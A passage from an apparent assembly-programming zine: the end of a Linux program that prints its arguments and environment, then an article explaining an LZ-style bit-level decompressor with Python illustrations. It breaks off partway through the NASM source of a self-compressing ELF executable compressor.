         inc     al              ; return 1 (failure), SYS_exit
         push    eax
         push    eax
         int     80h

; ELF programs always start at _start
global  _start
_start:
         ; We come here with "argc" on the top of the stack. Its value
         ; is at least 1. If not, something went seriously wrong.
         pop     ecx             ; ECX = argc
         jecxz   what.the.heck

         ; Print the prgmsg
         sub     eax, eax
         push    dword prglen
         push    dword prgmsg
         inc     al              ; stdout
         push    eax
         push    eax
         mov     al, 4           ;SYS_write
         int     80h
         add     esp, byte 16

         ; Get argv[0], i.e., the program path
         pop     ebx             ; EBX = argv[0]

         ; argv[0] is a NUL-terminated string. We can find its
         ; length by scanning for the NUL.
         sub     eax, eax
         sub     ecx, ecx
         cld
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx
         dec     ecx

         ; Print the string
         push    ecx
         push    ebx
         inc     al                      ; stdout
         push    eax
         push    eax
         mov     al, 4
         int     80h
         add     esp, byte 16

         ; Print the argmsg
         sub     eax, eax
         push    dword arglen
         push    dword argmsg
         inc     al                      ; stdout
         push    eax
         push    eax
         mov     al, 4                   ; SYS_write
         int     80h
         add     esp, byte 16

         ; By now, we have no idea what the value of argc was.
         ; We did not save it because we don't need it.
         ; The top of the stack now contains pointers
         ; to command line arguments (if any), followed
         ; by a NULL pointer.
         ;
         ; We simply print everything before the NULL.

.argloop:
         pop     ebx             ; next argument
         or      ebx, ebx
         je      .env            ; NULL pointer

         ; Print a tab
         sub     eax, eax
         inc     al
         push    eax
         push    dword tab
         push    eax             ; stdout
         mov     al, 4           ; SYS_write
         push    eax
         int     80h
         add     esp, byte 16

         ; Find the length
         sub     ecx, ecx
         sub     eax, eax
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx

         ; Append a new line
         mov     byte [edi-1], 0Ah

         ; Print the string
         push    ecx
         push    ebx
         inc     al              ; stdout
         push    eax
         mov     al, 4           ; SYS_write
         push    eax
         int     80h
         add     esp, byte 16
         jmp     short .argloop  ; next

.env:
         ; Print the envmsg
         sub     eax, eax
         push    dword envlen
         push    dword envmsg
         inc     al              ; stdout
         push    eax
         push    eax
         mov     al, 4           ; SYS_write
         int     80h
         add     esp, byte 16

         ; The top of the stack now contains pointers to
         ; environment variables, followed by a NULL pointer.
         ; We do what we did for the arguments:

.envloop:
         pop     ebx
         or      ebx, ebx
         je      .exit

         sub     eax, eax
         inc     al
         push    eax
         push    dword tab
         push    eax
         mov     al, 4
         push    eax
         int     80h
         add     esp, byte 16

         sub     ecx, ecx
         sub     eax, eax
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx
         mov     byte [edi-1], 0Ah

         push    ecx
         push    ebx
         inc     al
         push    eax
         mov     al, 4
         push    eax
         int     80h
         add     esp, byte 16
         jmp     short .envloop

.exit:
         sub     eax, eax        ; return 0 (success)
         push    eax
         inc     al              ; SYS_exit
         push    eax
         int     80h

;--- End of program ----------------------------------------------------------;



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                                Compressing data
                                                                by Feryno Gabris


First, an introduction to decompression. It needs a routine called
"get_next_bit". Here are 3 examples, which load the control bits one byte,
one word and one dword at a time:

;-----
get_next_bit:
         add     dl,dl
         jnz     no_new_byte
         lodsb
         mov     dl,al
         adc     dl,dl
no_new_byte:
         ret
;-----
get_next_bit:
         shl     bx,1
         jnz     no_new_word
         mov     bx,word [esi]
         inc     esi
         inc     esi
         rcl     bx,1
no_new_word:
         ret
;-----
get_next_bit:
         shl     ebp,1
         jnz     no_new_dword
         lodsd
         rcl     eax,1
         xchg    ebp,eax
no_new_dword:
         ret
;-----

And this is how get_next_bit is used:

;-----
         mov     esi,control_bits_offset
         mov     edi,place_for_store_decompressed_bytes
         cld
         mov     dl,80h
B0:     call    get_next_bit
         jc      L1
L0:     ... some decompress instructions ...
         jmp     B0
L1:     ... some decompress instructions ...
         jmp     B0

get_next_bit:
         add     dl,dl           ; move the next control bit into Carry: the
                                 ; highest bit goes to the Carry Flag and all
                                 ; lower bits are shifted left by 1
         jnz     no_new_byte
; the next 3 instructions run once all control_bits have been used up
         lodsb                   ; load new control_byte with 8 control_bits
         xchg    edx,eax         ; just move it to DL
         adc     dl,dl           ; put the highest control_bit into Carry,
                                 ; shift all bits left by 1 and recycle the
                                 ; bit set by MOV DL,80h (it becomes bit 0)
no_new_byte:
         ret
;-----

A note about two instructions: MOV DL,80h and ADC DL,DL.
MOV DL,80h sets up the first control bit, but this is not a true control bit
used to switch the decompressor between L0 and L1. In binary, 80h = 10000000b:
the highest bit (bit 7) is 1 and all other bits (bits 6 to 0) are 0. Let us
call this highest bit the helper_control_bit. It is never destroyed until the
decompression process ends. The ADC DL,DL instruction recycles it every time
all loaded bits (8 bits with LODSB, 32 bits with LODSD) have been used, i.e.
after 8 calls of get_next_bit with LODSB (1st example routine) or 32 calls
with LODSD (3rd example routine).
The first call of get_next_bit and a call made after all control_bits have
been used up look the same:

The state is: DL register = 80h = 10000000b

These instructions are executed:

1.      ADD     DL,DL
         80h + 80h = 00h, CarryFlag=1, ZeroFlag=1 (the helper_control_bit is
         now in Carry)

2.      LODSB
         loads a control_byte with 8 control_bits; this instruction doesn't
         touch Carry

3.      XCHG    EDX,EAX
         moves the control_byte to the DL register; this instruction doesn't
         touch Carry (note that PUSH, POP, MOV, XCHG, INC, LODSB, ... don't
         change Carry)

4.      ADC     DL,DL
         recycles the helper_control_bit (it enters at bit 0), shifts all
         bits left by 1, and the highest control_bit goes to Carry
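
For readers who prefer to trace this away from the flags register, here is a
small Python model of the byte-wide routine. It is a sketch only: the class
name BitReader and the attribute names are invented for this illustration,
and the carry is simulated by keeping the ninth bit of each addition.

```python
class BitReader:
    """Model of the byte-wide get_next_bit (ADD DL,DL / LODSB / ADC DL,DL)."""

    def __init__(self, data):
        self.data = data
        self.pos = 0          # plays the role of ESI
        self.dl = 0x80        # MOV DL,80h: only the helper bit is set

    def get_next_bit(self):
        total = self.dl + self.dl                 # ADD DL,DL
        carry, self.dl = total >> 8, total & 0xFF
        if self.dl == 0:                          # only the helper bit was left
            byte = self.data[self.pos]            # LODSB
            self.pos += 1
            total = byte + byte + carry           # ADC DL,DL (carry = helper bit)
            carry, self.dl = total >> 8, total & 0xFF
        return carry                              # the control bit

reader = BitReader(bytes([0xA5, 0xFF]))
print([reader.get_next_bit() for _ in range(8)])   # bits of A5h, highest first
```

After the eighth call DL is back at 80h, so the ninth call loads the next
byte exactly as the very first call did.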

This may be the most difficult part of the decompressor to understand. OK,
next... The instructions at L0 and L1 can look like this:

L0:     MOVSB
         JMP     B0
L1:     ... calculate ECX
         ... calculate EBX (delta, shift)
         PUSH    ESI
         MOV     ESI,EDI
         SUB     ESI,EBX
         REPZ MOVSB
         POP     ESI
         JMP     B0

The first mode, L0, isn't a true decompression mode. The byte isn't
compressed; it is only copied. This mode has a bad pack ratio, but it must be
used to store bytes that can't be produced by the L1 mode. It uses 1 byte +
1 bit = 9 bits to store 1 byte = 8 bits.

The second mode, L1, is the true decompression mode. It calculates ECX, the
number of bytes to decompress, and EBX, a value that can be called DELTA or
SHIFT. This assumes that the same chain of ECX bytes is found at both [EDI]
and [EDI-EBX] in the data bytes, so that ASM code like:

         MOV     ESI,EDI
         SUB     ESI,EBX
         REPZ CMPSB

run over the data bytes by the compression process returns with ZeroFlag=1
and ECX=0. This mode has a good pack ratio, better for long chains (big ECX)
and small shifts (small EBX). The methods for calculating ECX and EBX are
similar:
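
What the L1 copy does to the output can be sketched in a few lines of Python.
This is a model, not the author's code: copy_match is a name made up here,
output stands for the bytes already stored below EDI, and the byte-by-byte
loop mirrors MOVSB so that source and destination may overlap.

```python
def copy_match(output, delta, count):
    """Append count bytes, each copied from delta positions back in the
    already decompressed data (PUSH ESI / MOV ESI,EDI / SUB ESI,EBX /
    REPZ MOVSB / POP ESI)."""
    if not 1 <= delta <= len(output):
        raise ValueError("delta must point inside the data already written")
    for _ in range(count):
        output.append(output[-delta])   # one MOVSB step
    return output

print(copy_match(bytearray(b"abc"), 3, 5))   # repeats "abc" beyond its length
print(copy_match(bytearray(b"x"), 1, 3))     # delta 1 repeats the last byte
```

Because the copy proceeds one byte at a time, count may be larger than
delta; the bytes just written are read again as the copy moves on.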

Clearly neither ECX nor EBX is zero (ECX<>0, EBX<>0), hence the highest
significant bit of each register is always 1 and need not be stored.

The first instruction for calculating ECX sets up that highest bit=1; all
following bits are supplied by calls to get_next_bit. The first instruction
is:

         MOV     ECX,1

or INC ECX if ECX=0.

Next instructions are:

         CALL    GET_NEXT_BIT
         ADC     ECX,ECX                 ; as well RCL ECX,1 can be used

How do we know when to stop calculating ECX? Again by calling get_next_bit!
Here is the full routine for calculating ECX in the decompressor:

         MOV     ECX,1
LCC0:   CALL    GET_NEXT_BIT
         ADC     ECX,ECX
         CALL    GET_NEXT_BIT
         JC      LCC0

The minimal value this code can produce is ECX=2. ECX=1 isn't needed because
that case is handled by the L0 mode (MOVSB); L0 is a more rational way to
pack 1 byte than the L1 mode, even though it has a bad pack ratio.

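Example: calculating ECX=5=101b.
The highest bit is supplied by INC ECX (or MOV ECX,1), so I remove it, which
leaves binary 01b. Each remaining bit is followed by a second bit that says
whether to continue (1) or stop (0).
The bit sequence for calculating ECX=5 is 01 10 binary.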

Calculating ECX=110100b:
Remove the highest bit (the decompressor supplies it with INC ECX), which
leaves binary 10100b.
The bit sequence for calculating ECX is 11 01 11 01 00 binary.

Calculate ECX=2=10b. Bit sequence is 0 0 binary.
Calculate ECX=3=11b. Bit sequence is 1 0 binary.
Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary.
Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary.
Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary.
Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary.
Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary.
Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary.
Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary.
Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary.
Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary.
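
The table can be reproduced mechanically. The following Python sketch encodes
and decodes the same bit sequences; the function names encode_count and
decode_count are made up for this illustration, and bits are plain lists of
0 and 1 rather than a packed stream.

```python
def encode_count(value):
    """Return the bit list that the ECX loop turns back into value (>= 2).
    Each data bit is followed by a continue bit: 1 = more, 0 = stop."""
    if value < 2:
        raise ValueError("the smallest value this code can express is 2")
    data_bits = [int(ch) for ch in bin(value)[3:]]   # drop '0b' and the top 1
    bits = []
    for index, bit in enumerate(data_bits):
        bits.append(bit)
        bits.append(1 if index < len(data_bits) - 1 else 0)
    return bits

def decode_count(bits):
    """Mirror of MOV ECX,1 / CALL GET_NEXT_BIT / ADC ECX,ECX /
    CALL GET_NEXT_BIT / JC loop."""
    stream = iter(bits)
    ecx = 1
    while True:
        ecx = ecx * 2 + next(stream)    # ADC ECX,ECX
        if next(stream) == 0:           # JC falls through when the bit is 0
            return ecx

for value in (2, 3, 5, 8, 19):
    print(value, encode_count(value))
```

A value with n significant bits costs 2*(n-1) bits, so small counts are
cheap and every doubling of the count costs two more bits.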

Calculating EBX shares some steps with calculating ECX but differs in others.
EBX can be 1, which can be achieved like this:

         MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
         ADC     EBX,EBX
         CALL    GET_NEXT_BIT
         JC      LCD0
         DEC     EBX

But experiments show that EBX>16 is common, and for EBX<16 another
decompression mode can be used. With the code above, calculating EBX=15
requires 8 bits = 1 byte. It's better to use 8 bits = 1 byte to fill BL in
EBX directly and to calculate only the bits above BL (bits 31 to 8) in a way
similar to calculating ECX.
Here it is:

         MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
         ADC     EBX,EBX
         CALL    GET_NEXT_BIT
         JC      LCD0
         DEC     EBX
         DEC     EBX
         SHL     EBX,8
         MOV     BL,byte [ESI]
         INC     ESI

Note that DEC EBX must be used at least twice to make EBX=0 possible before
SHL EBX,8 shifts all bits up and frees BL.
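
The arithmetic of this routine is easy to check by hand. Here is a Python
sketch of the last five instructions; decode_delta, high_code and low_byte
are names invented for the illustration, with high_code standing for the
value left in EBX by the bit loop (always 2 or more).

```python
def decode_delta(high_code, low_byte):
    """Combine the bit-coded high part with the plain low byte.
    high_code: value produced by the LCD0 loop (>= 2).
    low_byte:  byte read directly from the input with MOV BL,[ESI]."""
    if high_code < 2 or not 0 <= low_byte <= 0xFF:
        raise ValueError("high_code must be >= 2 and low_byte must be a byte")
    ebx = high_code - 2        # DEC EBX / DEC EBX
    ebx <<= 8                  # SHL EBX,8 frees BL
    return ebx | low_byte      # MOV BL,byte [ESI]

print(hex(decode_delta(2, 0x34)))   # smallest code: delta fits in BL alone
print(hex(decode_delta(3, 0x12)))
```

With the smallest code (2, sent as the two bits 0 0) every delta from 1 to
0FFh costs 2 + 8 = 10 bits.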

There is also a mode named without_change_delta. The principle is to use DEC
EBX 3 times, so that a calculated EBX=2 becomes EBX=-1. EBX=-1 indicates that
calculating a new delta isn't needed and the old delta can be used. The old
delta can be saved in an unused register or on the stack by the previous
SUB ESI,EBX / REPZ MOVSB sequence and restored in without_change_delta mode.

The principle of the mode for packing 2-3 bytes with a delta from 1 to 7Fh:

1. Load 1 byte = 8 bits
2. bit 0 = 1 indicates 2 packed bytes
   bit 0 = 0 indicates 3 packed bytes
3. the high 7 bits (bits 7 to 1) are the delta

Here is a code example:

         XOR     EBX,EBX ; (EBX=0)
         MOV     ECX,1   ; (ECX=1)
         MOV     BL,[ESI]
         INC     ESI
         SHR     BL,1    ; tests bit 0 (it goes to Carry) and shifts the
                         ; other bits down to make EBX=delta
         SBB     CL,0
         INC     ECX
         INC     ECX

Clearly a result of BL=0 after this code is an impossible delta. I use it to
TERMINATE the decompression process.
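
In other words, one byte carries both the delta and the choice between 2 and
3 bytes. A Python sketch of the same decoding follows; decode_short_match is
a hypothetical name, and returning None for the terminator is a choice made
only for this illustration.

```python
def decode_short_match(byte):
    """Decode the one-byte form of the 2-3 byte mode.
    Returns (delta, count), or None when delta is 0 (the terminator)."""
    delta = byte >> 1                 # SHR BL,1: bits 7..1 are the delta
    count = 2 if byte & 1 else 3      # SBB CL,0 / INC ECX / INC ECX
    if delta == 0:
        return None                   # impossible delta: end of data
    return delta, count

print(decode_short_match(0x03))   # delta 1, bit 0 set
print(decode_short_match(0x02))   # delta 1, bit 0 clear
print(decode_short_match(0x00))   # terminator
```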

A nice idea for packing 1 byte with a delta from 1 to 15:

         XOR     EBX,EBX
         MOV     ECX,1
         MOV     BL,00010000b    ; marker bit, shifted out after 4 bits
U02:    CALL    GET_NEXT_BIT
         ADC     BL,BL
         JNC     U02

A result of EBX=0 is an impossible delta, so it is used to pack the byte 00h.
This byte 00h is the most frequent byte in 32-bit opcodes. The code above
continues:

         JNZ     STORE_1_BYTE
         XCHG    EBX,EAX ; make EAX=0 with a 1-byte 32-bit opcode
         JMP     STORE_BYTE
         ...
STORE_1_BYTE:
         NEG     EBX
         MOV     AL,[EDI+EBX]
STORE_BYTE:
         STOSB
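
The whole single-byte mode can be modelled like this. It is a sketch under
assumptions: decode_single_byte is an invented name, bits is a plain list
holding the next four control bits (most significant first), and output
stands for the data already stored below EDI.

```python
def decode_single_byte(bits, output):
    """Read a 4-bit delta and append one byte to output: 00h when the
    delta is 0, otherwise the byte found delta positions back."""
    stream = iter(bits)
    bl = 0b00010000                  # marker bit, as in MOV BL,00010000b
    while True:
        bl = bl * 2 + next(stream)   # ADC BL,BL
        if bl > 0xFF:                # marker shifted out: Carry set, loop ends
            bl &= 0xFF
            break
    if bl == 0:
        output.append(0)             # impossible delta means byte 00h
    else:
        output.append(output[-bl])   # NEG EBX / MOV AL,[EDI+EBX] / STOSB
    return output

data = bytearray(b"AB")
print(decode_single_byte([0, 0, 1, 0], data))   # delta 2 copies 'A'
print(decode_single_byte([0, 0, 0, 0], data))   # delta 0 stores 00h
```

The marker bit is what ends the loop: no separate counter is needed because
the carry appears exactly when four bits have been shifted in.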

That is all for the introduction to decompression, apart from one part of
the decompressor not shown so far. It looks like this:

                 CMP     EBX,7D00h
                 JNC     ZVYS_O_DVE      ; delta >= 7D00h: ECX = ECX + 2
                 CMP     EBX,500h
                 JNC     ZVYS_O_JENNU    ; delta >= 500h: ECX = ECX + 1
                 JMP     NYST_NEZVYSUJ   ; smaller delta: ECX unchanged
ZVYS_O_DVE:     INC     ECX
ZVYS_O_JENNU:   INC     ECX
NYST_NEZVYSUJ:

It's not rational to compress 2 bytes with delta > 4FFh because that
requires 2+(3*2)+8+2 = 18 bits, and the same can be done by using the MOVSB
mode twice (2*9 = 18 bits).

U00:    movsb                   ; require 1 byte = 8 bits
         call    get_next_bit    ; require 1 bit
         jnc     U00

It is rational to compress 4 bytes with delta > 7CFFh because that requires
2+(7*2)+8+(2*2) = 28 bits without this implementation and 26 bits with it.
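
These totals can be recomputed with a short Python sketch. The layout it
assumes is my reading of the sums in the text, not something the text states
outright: 2 bits to select the mode, the paired bit code for the high part
of the delta plus 3 (the three DEC EBX of without_change_delta), 8 bits for
the low delta byte, and the paired bit code for the length. All function
names are invented for this illustration.

```python
def pair_bits(value):
    """Bits used by the (data bit, continue bit) code for value >= 2."""
    return 2 * (value.bit_length() - 1)

def match_bits(delta, length_code):
    """Cost of one match under the assumed layout described above."""
    return 2 + pair_bits((delta >> 8) + 3) + 8 + pair_bits(length_code)

def literal_bits(count):
    """Cost of count bytes stored in MOVSB mode: 8 bits + 1 control bit."""
    return 9 * count

print(match_bits(0x500, 2), literal_bits(2))    # 2 bytes, delta 500h
print(match_bits(0x7D00, 4), literal_bits(4))   # 4 bytes, length sent as 4
print(match_bits(0x7D00, 2))                    # 4 bytes, length sent as 2
```

With the length adjustment the decompressor adds 2 to ECX for such a delta,
so a chain of 4 bytes is sent as length 2, which saves one pair of bits.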


Intro for COMPRESS...
---------------------
Some equivalents:

DECOMPRESS         COMPRESS
MOV DL,80h         CALL o_c_0         ; setup helper_control_bit
CALL GET_NEXT_BIT  CALL PUT_BIT

The routines that scan for chains, calculate the bits required to pack a
chain, pack the chain, and apply some optimizations to find better chains
are in the source code.

The source is an ELF compressor, but it isn't a universal ELF compressor. It
supports only the ELF header included in the source. This header is enough
for use with NASM on Linux. You can download the sources as well as binaries
from:

http://feryno.home.sk/projects/compressELF.tar.gz

; ----- CUT HERE -----

; fy1ename: a00.asm
; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e
; Au~tchor: ch lap aj   Feryno
; kompy1e:
; nasm -f bin a00.asm
; chmod +x a00
; example of use
; ./a00 a00 compressed_a00
; this self compress compressor

BITS 32

                 org     08048000h

ehdr:                                           ; Elf32_Ehdr
                 db      7Fh, 'ELF', 1, 1, 1     ;   e_ident
         times 9 db      0
                 dw      2                       ;   e_type
                 dw      3                       ;   e_machine
                 dd      1                       ;   e_version
                 dd      START                   ;   e_entry
                 dd      phdr - $$               ;   e_phoff
                 dd      0                       ;   e_shoff
                 dd      0                       ;   e_flags
                 dw      ehdrsize                ;   e_ehsize
                 dw      phdrsize                ;   e_phentsize
phdr:                                                           ; Elf32_Phdr
                 dw      1                       ;   e_phnum     ;   p_type
                 dw      0                       ;   e_shentsize
                 dw      0                       ;   e_shnum     ;   p_offset
                 dw      0                       ;   e_shstrndx
ehdrsize        equ     $ - ehdr
                 dd      $$                                      ;   p_vaddr
                 dd      $$                                      ;   p_paddr
                 dd      filesize                                ;   p_filesz
                 dd      memsize                                 ;   p_memsz
                 dd      111b                                    ;   p_flags
;                       EWR
;Exec,Write,Read
                 dd      1000h                                   ;   p_align
phdrsize        equ     $ - phdr

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

START:

         pop     ebx     ; pop number of strings in command line, must be =3
         dec     ebx
         dec     ebx
         dec     ebx     ; set zero flag if after this EBX=0
         pop     ebx     ; offset of first string ( executable file )
         jz      short mode ; number of strings = 3 = executable + file0 +
                            ; file1
use:    mov     ecx,usage
         xor     edx,edx
         mov     dl,usagesize
;;;     call    WS
         jmp     short ex00

mode:   pop     ebx     ; pop offset of second string (first string, 0,
                         ; second string, 0, third...)

open:   mov     edi,f0h
         cld

; ebx is now pointed to second string in a shell = in_file
open_f: xor     ecx,ecx ; open flags, open for read-only
;       xor     eax,eax
;       mov     al,5    ; sys_open
         db      6Ah,5   ; push dword 5
         pop     eax
         int     80h     ; open , note - return HANDLE in EAX
         or      eax,eax
         jns     short OK_open
         mov     ecx,MEOF
;       xor     edx,edx
;       mov     dl,MEOFS
         db      6Ah,MEOFS       ; push dword MEOFS
         pop     edx
;;;     call    WS
ex00:   jmp     short ex01
OK_open:stosd           ; store file handle

         pop     ebx     ; EBX pointed to second filename out_file
         mov     ecx,111101101b  ; 111 owner can read, write, execute;
                                 ; 101 group can read and execute / search
                                 ; but not write; 101 others same as group
;       xor     eax,eax
;       mov     al,8    ; sys_creat
         db      6Ah,8   ; push dword 8
         pop     eax
         int     80h     ; creat , note - return HANDLE in EAX
         or      eax,eax
         jns     short OK_creat
         mov     ecx,MECF
;       xor     edx,edx
;       mov     dl,MECFS
         db      6Ah,MECFS       ; push dword MECFS
         pop     edx
;;;     call    WS
ex01:   jmp     short ex02
OK_creat:stosd          ; store file handle

                         ; EDI=f0s
         mov     ebx,dword [edi - 4*2]   ; handle for in_file
         xor     ecx,ecx ; ECX=0 seek 0 bytes
;       xor     edx,edx
;       inc     edx
;       inc     edx     ; EDX=2 seek to end of file + ECX=0 bytes
         db      6Ah,2   ; push dword 2
         pop     edx
;       xor     eax,eax
;       mov     al,13h  ; sys_seek
         db      6Ah,19  ; push dword 19
         pop     eax
         int     80h     ; note - return filesize in EAX
         or      eax,eax
         jns     short OK_seek_to_end
         mov     ecx,MSEEF
;       xor     edx,edx
;       mov     dl,MSEEFS
         push    byte MSEEFS
         pop     edx
;;;     call    WS
ex02:   jmp     short ex03
OK_seek_to_end:
;;;     or      eax,eax
;;;     jz      ex04    ; filesize=0 -> this file needn't compression
         cmp     eax,f0b_size
         jnbe    ex04    ; LIMIT f0b_size OVERFLOW !!!!!!
         cmp     eax,4Ch
         jbe     ex04    ; can't be a ELF executable, ELF header require 4C
                         ; bytes
         stosd           ; store in_file size to f0s_2
         stosd           ; store in_file size to f0s
         push    eax     ; and push it to stack

         xor     ecx,ecx ; seek 0 bytes
         xor     edx,edx ; seek to begin of file + ECX=0 bytes
;       xor     eax,eax
;       mov     al,13h
         db      6Ah,19  ; push dword 19
         pop     eax
         int     80h
         or      eax,eax
         jns     short OK_seek_to_begin
         mov     ecx,MSEBF
;       xor     edx,edx
;       mov     dl,MSEBFS
         db      6Ah,MSEBFS      ; push dword MSEBFS
         pop     edx
;;;     call    WS
ex03:   jmp     short wsex04
OK_seek_to_begin:

         mov     esi,fy1eObuffer
         mov     edi,f1b

read_f: mov     ecx,esi
         pop     edx     ; pop in_file_size from stack
;       xor     eax,eax
;       mov     al,3    ; sys_read
         db      6Ah,3   ; push dword 3
         pop     eax
         int     80h     ; note - return in EAX number of bytes read
                         ; (negative value if error)
         cmp     eax,edx
         jz      short OK_read
oops:   mov     ecx,MERF
;       xor     edx,edx
;       mov     dl,MERFS
         db      6Ah,MERFS       ; push dword MERFS
         pop     edx
wsex04: call    WS
ex04:   jmp     long ex05       ;short ex05
OK_read:

         add     eax,esi
         mov     dword [konyc_dat],eax
;       mov     ecx,4Ch         ; header size
         db      6Ah,4Ch         ; push dword 4Ch
         pop     ecx
         sub     dword [f0s],ecx
         repz movsb
         push    esi
         mov     esi,uncompress_routine
         mov     cl,uncompress_routine_size
         repz movsb
         pop     esi

; all self compressing is below this:

         movsb           ; first byte, store it, this byte can't be
                         ; compressed
         call    o_C_0   ; setup [position] and byte on [position]
         dec     dword [f0s]
         jz      near terminate002

;       xor     eax,eax
;       mov     dword [last_delta],eax  ; I know: all data in UDATASEG is
;                                       ; zero, but this code uses dirty
;                                       ; tricks and must be sure:
;                                       ; dword [last_delta] can be non zero
;                                       ; if the compressed fy1e overwrites
;                                       ; [last_delta], but I hope that the
;                                       ; compressed fy1e will be smaller
;                                       ; than the original executable
         call    progress

compress002:

         call    scan002

; some optimizations to find a better chain than the one found by scan002
         cmp     eax,1
         jbe     near    cant_optimize_002_L0
; at ESI there is a chain of length EAX
; check whether there is a chain at ESI that needs no change of delta;
; if there is, use that chain
         call    scanincd        ; include procedure in scan_ncd.inc
         jc      cant_optimize_002_L1
         mov     ebx,dword [last_delta]
; packing without change of delta has the highest pack priority ( the best
; pack ratio )
         jmp     near    A08_new_optimalization

cant_optimize_002_L1:
         xchg    dword [last_delta],ebx
         push    ebx
         push    eax
         push    esi
         add     esi,eax
         stc
         cmp     dword [konyc_dat],esi
         jz      chumaj
         inc     esi
         cmp     dword [konyc_dat],esi
         jz      chumaj
         call    scan002
         call    scanincd
chumaj: pop     esi
         pop     eax
         pop     ebx
         xchg    dword [last_delta],ebx
         jnc     near    cant_optimize_002_L0

skus_toto_L0:
         push    ebx
         push    eax
         inc     esi
         call    scan002
         call    scanincd
         dec     esi             ; DEC don't change Carry !!!
         xchg    ecx,eax         ; number of bytes to ECX
                                 ; XCHG don't change Carry !!!
         pop     eax             ; POP don't change Carry !!!
         pop     ebx
         jc      try_next_optimalization
; does using a chain without change of delta require fewer bits to pack?
         call    bitreq_02
         push    edx             ; number of bits for pack non-optimized
                                 ; chain
         xchg    ecx,eax         ; number of bytes of non-optimized chain ->
                                 ; ECX, number of bytes of chain without
                                 ; change delta -> EAX
         push    ebx
         mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
         call    bitreq_02       ; return EDX = number of bits for pack chain
                                 ; without change delta
         pop     ebx

         push    edx
         push    eax
         xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                 ; without change delta )
         call    bitreq_02
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         xchg    ecx,eax         ; restore EAX = number of bytes of
                                 ; non-optimized chain
         inc     ecx             ; number of bytes for pack optimized chain
         cmp     eax,ecx
         pop     ecx             ; number of bits for pack non-optimized
                                 ; chain
         jc      near    pack_1_byte_look_better
         cmp     edx,ecx
         jc      near    pack_1_byte_look_better

try_next_optimalization:

         cmp     eax,3
         jc      try_old_optimalization
         push    ebx
         push    eax
         inc     esi
         inc     esi
         call    scan002
         call    scanincd
         dec     esi
         dec     esi
         xchg    ecx,eax         ; number of bytes to ECX
                                 ; XCHG don't change Carry !!!
         pop     eax             ; POP don't change Carry !!!
         pop     ebx
         jc      try_old_optimalization
; does using a chain without change of delta require fewer bits to pack?
         call    bitreq_02
         push    edx             ; number of bits for pack non-optimized
                                 ; chain
         xchg    ecx,eax         ; number of bytes of non-optimized chain ->
                                 ; ECX, number of bytes of chain without
                                 ; change delta -> EAX
         push    ebx
         mov     ebx,dword [last_delta]  ; make EBX = EBX in last pack_02
         call    bitreq_02       ; return EDX = number of bits for pack chain
                                 ; without change delta
         pop     ebx

         push    edx
         push    eax
         xor     eax,eax         ; simulate pack 1 byte first ( before chain
                                 ; without change delta )
         call    bitreq_02
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         xchg    ecx,eax         ; restore EAX = number of bytes of
                                 ; non-optimized chain
         inc     ecx
         inc     ecx             ; number of bytes for pack optimized chain
         cmp     eax,ecx
         pop     ecx             ; number of bits for pack non-optimized
                                 ; chain
         jc      near    pack_1_byte_look_better
         cmp     edx,ecx
         jc      near    pack_1_byte_look_better

try_old_optimalization:
         push    esi
         add     esi,eax
         cmp     dword [konyc_dat],esi
         pop     esi
         jz      near    L_NO_0

         call    bitreq_02

         push    ebx
         push    eax
         push    edx
         push    eax

         push    esi
         add     esi,eax
         call    scan002
         call    bitreq_02
         pop     esi
         add     dword [esp+0*4],eax
         add     dword [esp+1*4],edx

         xor     eax,eax
         call    bitreq_02
         push    edx
         inc     esi
         call    scan002
         call    bitreq_02
         dec     esi
         add     dword [esp+0*4],edx
         pop     edx             ; EDX=bits required by pack 1 byte first
         inc     eax             ; EAX=bytes packed in 2 steps , pack 1 byte
                                 ; first

         cmp     dword [esp+0*4],eax
         jc      obnov_to
;;;     clc
         jnz     obnov_to
         cmp     edx,dword [esp+1*4]
obnov_to:
         pop     eax
         pop     edx
         pop     eax
         pop     ebx
         jc      near    pack_1_byte_look_better

A08_new_optimalization:
         cmp     eax,3
         jc      near    can_t_use_new_optimalization_08
         push    esi
         add     esi,eax
         inc     esi
         inc     esi
         inc     esi             ; messing around this close to the end of
                                 ; the data is a very bad idea: it isn't
                                 ; useful to try the code marked DANGEROUS
                                 ; for the last 3 bytes because this can be
                                 ; unstable (data in f0b overleap)
         cmp     dword [konyc_dat],esi
         pop     esi
         jbe     this_is_it
         xchg    dword [last_delta],ebx
         push    ebx
         push    eax
         push    esi
         add     esi,eax
         inc     esi             ; DANGEROUS , ESI+1
         call    scan002
         call    scanincd        ; DANGEROUS , must be ESI + 1 + EAX (where
                                 ; EAX > 1)
         pop     esi             ; POP instruction doesn't change Carry (=CF)
                                 ; !!!
         pop     eax             ; POP instruction doesn't change Carry (=CF)
                                 ; !!!
         pop     ebx
         xchg    dword [last_delta],ebx  ; XCHG instruction doesn't change
                                         ; Carry (=CF) !!!
         jnc     can_t_use_new_optimalization_08

this_is_it:
         push    ebx
         push    eax
         push    edx     ;db     6Ah,0   ; push dword 0  ; bits count=0 but
                                         ; will be overwritten first time
                                         ; because chain > 0 bytes will be
                                         ; found
         db      6Ah,0   ; push dword 0  ; chain length counter

new_optimalization_08_L0:
         call    scan_lim                ; scan EAX chain length, return min.
